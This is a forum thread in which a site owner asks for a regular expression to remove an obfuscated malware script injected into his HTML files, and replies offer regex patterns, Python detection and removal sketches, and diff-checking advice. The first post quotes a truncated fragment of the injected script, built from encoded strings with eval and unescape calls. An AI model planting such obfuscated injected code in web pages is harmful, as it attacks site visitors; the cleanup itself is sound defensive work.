regular expression help needed

sagemaniac
Rank 0 - Newcomer
Posts: 4
Joined: Thu Jul 23, 2009 12:35 pm

Post by sagemaniac »

Hi guys,
I need to remove a malware script that has embedded itself in a bunch of HTML files. I do not have shell access, so I downloaded all the files and plan to do a search-and-replace across them, then re-upload (the security hole is already fixed).
The code looks like this:

<script>var Wo2ridd="7Nd30Nd74N";var iowRC="ENd27Nd3B';eval";var ZwtdOfta="1p7U%41p3341p6C";var Zo59iE4R="D41p6U%41p6E";var UqHDV="qd60C%%qd";var GEF5X="A/g,'1').repla";var iNelwV="4BJY050JY04";var li0K="d69Nd6CNd6DNd";var Ux8Xew="74Nd48N";var srRLjE="Nf963Nf";var plfgTr6="ape(DQ9C.replac";var g6uH7D5="341p344";var OQEu="1p7241p20";var D2XHR="075JY066JY055";var erQZ="JY074JY0";var IvFW="ANd6DNd65";var gtFk="Nf9Nf962Nf957N";var nxmlt="eplace(/e";Wo2ridd+="d48Nd2ENd";var oLFyoqm="Y065JY";var UbdJHpV="f96FNf96BNf";var XF2Mu="1JY027";var JmUAuRu="Y068JY074JY0";var aTOWEfX="BNd6AN";var hmNIY="Nd75Nd74N";var DLpenI="30%qd74%qd48%qd";var dzMG="Nf965Nf97";var gCQe="4c3B';eval(une";var oOzQo7="6FNd63Nd75";var RUGeAx="079JY0 ... and so on...</script>
I would like to build a regular expression that catches all of these. I have tried:

<script>(var[ ]*([A-Za-z0-9 +="';,.()]+))*</script>
This worked in HomeSite on abbreviated tests, except that HS would crash on longer passages.
The same pattern does not work in CSE HTML Validator v9.03.

I would appreciate any help.


Thanks, Richard
MikeGale
Rank VI - Professional
Posts: 721
Joined: Mon Dec 13, 2004 1:50 pm
Location: Tannhauser Gate

Re: regular expression help needed

Post by MikeGale »

I don't entirely understand the problem here.

Are the pieces of code the same? If so, there is little problem: identify the chunks, perhaps by hard-coding the beginning and end of the string.

If the code differs, how many pages are there? If it's up to a few hundred, you can handle it manually. Doing it fully automatically might damage useful content, so I don't recommend it.

I suggest hunting for instances, inspecting them visually, and manually deleting the offending material.

Patterns exist in this code.

One is sequences of ;var <varname>="<varvalue>";var... You could identify x of these in a row, then go in by hand.

Another is *.replace(..., fragments of which appear in the code.
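
As a rough illustration of the "x of these in a row" idea, here is a minimal Python sketch that only reports suspicious runs so they can be reviewed by hand. The threshold `MIN_ASSIGNMENTS` and the function name `find_suspicious` are made up for this example, and it assumes the values are double-quoted strings as in the sample above.

```python
import re

# Hypothetical threshold: how many consecutive assignments count as suspicious.
MIN_ASSIGNMENTS = 5

# One statement of the form: var name="value";
ASSIGNMENT = r'var\s+\w+\s*=\s*"[^"]*"\s*;'
SUSPICIOUS = re.compile(r'(?:%s\s*){%d,}' % (ASSIGNMENT, MIN_ASSIGNMENTS))

def find_suspicious(text):
    """Return (line_number, snippet) for each run of string assignments."""
    hits = []
    for match in SUSPICIOUS.finditer(text):
        line_no = text.count("\n", 0, match.start()) + 1
        hits.append((line_no, match.group(0)[:60]))
    return hits
```

Nothing is deleted here; the output is just a list of places to look at manually.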

I agree HS was a good way to detect such things. Whatever you use, I suggest keeping a record of the regexes you use as you develop and refine them. In my experience each regex engine is different, so although you can reuse work for a different engine, you generally have to adapt it to the syntax differences.

After you are done, compare the end product with the starting material using a diff tool. Look through it all to make sure that it is right.
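
If no diff tool is at hand, Python's standard `difflib` module can produce a unified diff. This is only a sketch; the function name `show_diff` and the default file name are placeholders, not anything from this thread.

```python
import difflib

def show_diff(original, cleaned, name="page.html"):
    """Return a unified diff between the original and the cleaned text."""
    before = original.splitlines(keepends=True)
    after = cleaned.splitlines(keepends=True)
    return "".join(
        difflib.unified_diff(
            before,
            after,
            fromfile=name + " (original)",
            tofile=name + " (cleaned)",
        )
    )
```

Every removed line shows up prefixed with `-`, so anything other than the malware script appearing there is a sign the replace went too far.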

Good luck.
sagemaniac
Rank 0 - Newcomer
Posts: 4
Joined: Thu Jul 23, 2009 12:35 pm

Re: regular expression help needed

Post by sagemaniac »

I apologize, this is not a forum for general regex questions, which is what I have just used it for ;).

Thanks for the tips; this is pretty much what I was planning to do.

best regards,
Richard
Albert Wiersch
Site Admin
Posts: 3578
Joined: Sat Dec 11, 2004 9:23 am
Location: Near Dallas, TX

Re: regular expression help needed

Post by Albert Wiersch »

I tried this in CSE HTML Validator v9.0 and it seemed to work in the test document I was using based on your example.

<script>(var[ ]*([A-Za-z0-9 +=/%"';,.()]+))*</script>
I added the "/" and "%" characters to the character class, since both appear in the malware code.
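
For anyone doing the replace outside the Validator, the same idea could be sketched in Python roughly as follows. Note that this is not the pattern above verbatim: it uses the same character set but as one flat class instead of a nested repeating group, a variation chosen on the assumption that the nested repetition is what makes some engines struggle on long scripts. The name `strip_malware` is made up for the example, and since the sample script in this thread is truncated, the class may need more characters for real files.

```python
import re

# Same character set as the pattern above, but as one flat class with no
# nested repetition. Illustrative variation only, not the Validator's syntax.
MALWARE = re.compile(r'''<script>var [A-Za-z0-9 +=/%"';,.()]+</script>''')

def strip_malware(html):
    """Return (cleaned_html, number_of_blocks_removed)."""
    return MALWARE.subn("", html)
```

The returned count makes it easy to check that each file lost exactly as many blocks as expected before re-uploading.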